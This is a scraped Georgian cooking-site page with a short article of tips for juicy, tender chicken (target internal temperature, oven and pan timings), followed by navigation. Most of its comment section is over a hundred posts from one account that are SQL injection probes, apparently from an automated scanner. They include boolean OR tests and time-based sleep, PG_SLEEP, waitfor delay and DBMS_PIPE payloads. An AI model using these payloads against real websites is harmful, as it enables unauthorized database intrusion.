რეგისტრაცია შესვლა
1
გამარჯობა,
  • კულინარიული აღმოჩენების დროა!
  • ჩაინიშნეთ და შეაფასეთ საყვარელი რეცეპტები
  • გაუზიარეთ სხვებსაც საკუთარი კულინარიული შემოქმედება
დარეგისტრირდით ახლავე!
1
გამარჯობა,
კულინარიული აღმოჩენების დროა!
ჩაინიშნეთ და შეაფასეთ საყვარელი რეცეპტები
გაუზიარეთ სხვებსაც საკუთარი კულინარიული შემოქმედება
განათავსე რეცეპტები!
რამდენიმე ხრიკი, თუ როგორ მოვამზადოთ წვნიანი და რბილი ქათამი
ავტორი: Tekla_mi
ქათმის მომზადება ერთი შეხედვით ადვილია, მაგრამ ხშირად საბოლოო შედეგი მაინც გამომშრალი ხორცია. ჩვენ გაგიზიარებთ რამდენიმე მარტივ რჩევას, რის შემდეგაც თქვენი ქათმის ხორცი წვნიანი და ფაფუკი გახდება.


1. გამოიყენეთ საკვები თერმომეტრი, რათა შეამოწმოთ, მიაღწია თუ არა ქათმის ხორცმა უსაფრთხო მინიმალურ შიდა ტემპერატურას - 73 გრადუსს, რომელიც საკმარისია მავნე მიკრობების გასაქრობად.
 

2. ღუმელში გამოსაცხობად, უმჯობესია გამოიყენოთ ქათმის ხორცის ძვლიანი ნაწილები. აუცილებლად გააცხელეთ ღუმელი 10-15 წუთით ადრე 200 გრადუსზე. მოათავსეთ ქათმის ნაჭრები ღუმელში 20-22 წთ, შემდეგ დაუწიეთ ტემპერატურას 180 გრადუსზე მომდევნო 10 წთ. შედეგად მიიღებთ საოცრად წვნიან და რბილ ქათმის ხორცს.
 

3. თუ ქათმის ხორცს წვავთ ტაფაზე, უმჯობესია კარგად გაახუროთ ტაფა, დაასხათ ცხიმი, მოათავსოთ ქათმის ხორცი საშუალო ცეცხლზე 1 წთ. შემდეგ დაუწიოთ გაზს და დაბალ ცეცხზლე გააგრძელოთ 7-10 წთ წვა. ტაფას დაახურეთ თავსახური, რათა შეინარჩუნოს თავისი წვენი. შედეგად მიიღებთ უგემრიელეს ქათმის კერძს.

 

ბეჭდვა
კომენტარები
113 კომენტარი

lxbfYeaa
02/14/2025
555
lxbfYeaa
02/14/2025
555
lxbfYeaa
02/14/2025
-1 OR 2+261-261-1=0+0+0+1
lxbfYeaa
02/14/2025
-1" OR 2+371-371-1=0+0+0+1 --
lxbfYeaa
02/14/2025
1
lxbfYeaa
02/14/2025
1
lxbfYeaa
02/14/2025
555
lxbfYeaa
02/14/2025
-1' OR 2+798-798-1=0+0+0+1 --
lxbfYeaa
02/14/2025
1
lxbfYeaa
02/14/2025
5550'XOR(555*if(now()=sysdate(),sleep(15),0))XOR'Z
lxbfYeaa
02/14/2025
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
lxbfYeaa
02/14/2025
555-1)
lxbfYeaa
02/14/2025
555-1 OR 411=(SELECT 411 FROM PG_SLEEP(15))--
lxbfYeaa
02/14/2025
555IrfbZDPX' OR 146=(SELECT 146 FROM PG_SLEEP(15))--
lxbfYeaa
02/14/2025
555Qm8BRIPB') OR 326=(SELECT 326 FROM PG_SLEEP(15))--
lxbfYeaa
02/14/2025
1
lxbfYeaa
02/14/2025
1
lxbfYeaa
02/14/2025
1
lxbfYeaa
02/14/2025
1
lxbfYeaa
02/14/2025
555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
lxbfYeaa
02/14/2025
555'"
lxbfYeaa
02/14/2025
@@UBk7u
lxbfYeaa
02/14/2025
555
lxbfYeaa
02/14/2025
555
lxbfYeaa
02/14/2025
555
lxbfYeaa
02/14/2025
555
lxbfYeaa
02/14/2025
555
lxbfYeaa
02/14/2025
1
lxbfYeaa
02/14/2025
555
lxbfYeaa
02/14/2025
1
lxbfYeaa
02/14/2025
555
lxbfYeaa
02/14/2025
1
lxbfYeaa
02/14/2025
1
lxbfYeaa
02/14/2025
-1 OR 2+516-516-1=0+0+0+1 --
lxbfYeaa
02/14/2025
-1' OR 2+874-874-1=0+0+0+1 or '0y4GMQ3P'='
lxbfYeaa
02/14/2025
555*if(now()=sysdate(),sleep(15),0)
lxbfYeaa
02/14/2025
5550"XOR(555*if(now()=sysdate(),sleep(15),0))XOR"Z
lxbfYeaa
02/14/2025
555-1 waitfor delay '0:0:15' --
lxbfYeaa
02/14/2025
555M7c6sVOK'
lxbfYeaa
02/14/2025
1
lxbfYeaa
02/14/2025
1
lxbfYeaa
02/14/2025
1
lxbfYeaa
02/14/2025
1
lxbfYeaa
02/14/2025
1
lxbfYeaa
02/14/2025
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
lxbfYeaa
02/14/2025
1
lxbfYeaa
02/14/2025
555
lxbfYeaa
02/14/2025
555����%2527%2522\'\"
lxbfYeaa
02/14/2025
1
lxbfYeaa
02/14/2025
1
lxbfYeaa
02/14/2025
555
lxbfYeaa
02/14/2025
555
lxbfYeaa
02/14/2025
555
lxbfYeaa
02/14/2025
1
lxbfYeaa
02/14/2025
555
lxbfYeaa
02/14/2025
1
lxbfYeaa
02/14/2025
555
lxbfYeaa
02/14/2025
1
lxbfYeaa
02/14/2025
555
lxbfYeaa
02/14/2025
1
lxbfYeaa
02/14/2025
555
lxbfYeaa
02/14/2025
1
lxbfYeaa
02/14/2025
555
lxbfYeaa
02/14/2025
1
lxbfYeaa
02/14/2025
555
lxbfYeaa
02/14/2025
1
lxbfYeaa
02/14/2025
555
lxbfYeaa
02/14/2025
1
lxbfYeaa
02/14/2025
555
lxbfYeaa
02/14/2025
1
lxbfYeaa
02/14/2025
555
lxbfYeaa
02/14/2025
1
lxbfYeaa
02/14/2025
1
lxbfYeaa
02/14/2025
1
lxbfYeaa
02/14/2025
1
lxbfYeaa
02/14/2025
555
lxbfYeaa
02/14/2025
1
lxbfYeaa
02/14/2025
555
lxbfYeaa
02/14/2025
1
lxbfYeaa
02/14/2025
-1 OR 2+228-228-1=0+0+0+1 --
lxbfYeaa
02/14/2025
-1 OR 2+263-263-1=0+0+0+1
lxbfYeaa
02/14/2025
-1' OR 2+615-615-1=0+0+0+1 --
lxbfYeaa
02/14/2025
-1' OR 2+561-561-1=0+0+0+1 or 'DJ61pHIg'='
lxbfYeaa
02/14/2025
-1" OR 2+698-698-1=0+0+0+1 --
lxbfYeaa
02/14/2025
555
lxbfYeaa
02/14/2025
1*if(now()=sysdate(),sleep(15),0)
lxbfYeaa
02/14/2025
555
lxbfYeaa
02/14/2025
555
lxbfYeaa
02/14/2025
555
lxbfYeaa
02/14/2025
555
lxbfYeaa
02/14/2025
555
lxbfYeaa
02/14/2025
10'XOR(1*if(now()=sysdate(),sleep(15),0))XOR'Z
lxbfYeaa
02/14/2025
555
lxbfYeaa
02/14/2025
10"XOR(1*if(now()=sysdate(),sleep(15),0))XOR"Z
lxbfYeaa
02/14/2025
555
lxbfYeaa
02/14/2025
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
lxbfYeaa
02/14/2025
1-1; waitfor delay '0:0:15' --
lxbfYeaa
02/14/2025
1-1); waitfor delay '0:0:15' --
lxbfYeaa
02/14/2025
1-1 waitfor delay '0:0:15' --
lxbfYeaa
02/14/2025
1T18Fu0Yj'; waitfor delay '0:0:15' --
lxbfYeaa
02/14/2025
1-1 OR 346=(SELECT 346 FROM PG_SLEEP(15))--
lxbfYeaa
02/14/2025
1-1) OR 740=(SELECT 740 FROM PG_SLEEP(15))--
lxbfYeaa
02/14/2025
1-1)) OR 214=(SELECT 214 FROM PG_SLEEP(15))--
lxbfYeaa
02/14/2025
1QUltg100' OR 219=(SELECT 219 FROM PG_SLEEP(15))--
lxbfYeaa
02/14/2025
1etaRpB9t') OR 965=(SELECT 965 FROM PG_SLEEP(15))--
lxbfYeaa
02/14/2025
1dZoP6LtX')) OR 538=(SELECT 538 FROM PG_SLEEP(15))--
lxbfYeaa
02/14/2025
555
lxbfYeaa
02/14/2025
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
lxbfYeaa
02/14/2025
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
lxbfYeaa
02/14/2025
1
lxbfYeaa
02/14/2025
1'"
lxbfYeaa
02/14/2025
1����%2527%2522\'\"
lxbfYeaa
02/14/2025
@@3keuR
ბოლოს განთავსებული
როგორ ავირჩიოთ ბინა იდეალური სამზარეულოთი
საკვების მოსამზადებლად იდეალური სამზარეულოს მქონე ბინის არჩევა მნიშვნელოვანი ნაბიჯია კულინარიის ყველა მოყვარულისთვის.
თარიღი: 06/01/2024
ავტორი: tomato
ცხელი შოკოლადი
ატმის აზიური სალათა
რამდენიმე ხრიკი, თუ როგორ მოვამზადოთ წვნიანი და რბილი ქათამი
ქათმის მომზადება ერთი შეხედვით ადვილია, მაგრამ ხშირად საბოლოო შედეგი მაინც გამომშრალი ხორცია. ჩვენ გაგიზიარებთ რამდენიმე მარტივ რჩევას, რის შემდეგაც თქვენი ქათმის ხორცი წვნიანი და ფაფუკი გახდება.
თარიღი: 06/10/2022
ავტორი: Tekla_mi
როგორ უნდა დაიჭრას მთლიანი ქათამი
როგორ დავჭრათ მთლიანი ქათამი ნაჭრებად.
როგორ გავაკეთოთ ხურმის ჩირი
მოამზადეთ უგემრიელესი ხურმის ჩირი საკუთარი ხელით ძალიან მარტივად :)
მსგავსი სტატიები
თარიღი: 07/30/2019
ავტორი: tomato
კალაბაში კიტრისებრთა ოჯახის წარმომადგენელი ბოსტნეულია. მის სამშობლოდ აფრიკა მიიჩნევა, თუმცა გავრცელებულია მთელს მსოფლიოში, აზიიდან - ამერიკამდე.
თარიღი: 12/27/2017
ავტორი: khatia
2018 წლის საახალწლო რეცეპტების ნაკრები.
თარიღი: 05/21/2022
ავტორი: tomato
ქართული სამზარეულო მთელს მსოფლიოში დიდი პოპულარობით სარგებლობს, ტრადიციული კულინარია მრავალფეროვანი კერძებით გამოირჩევა და მათი გემო უდაოდ გამოარჩევს ქართულ სამზარეულოს სხვადასხვა ქვეყნის კერძებისგან, თუმცა კერძების მზადება დიდ ძალისხმევასთანაა დაკავშირებული.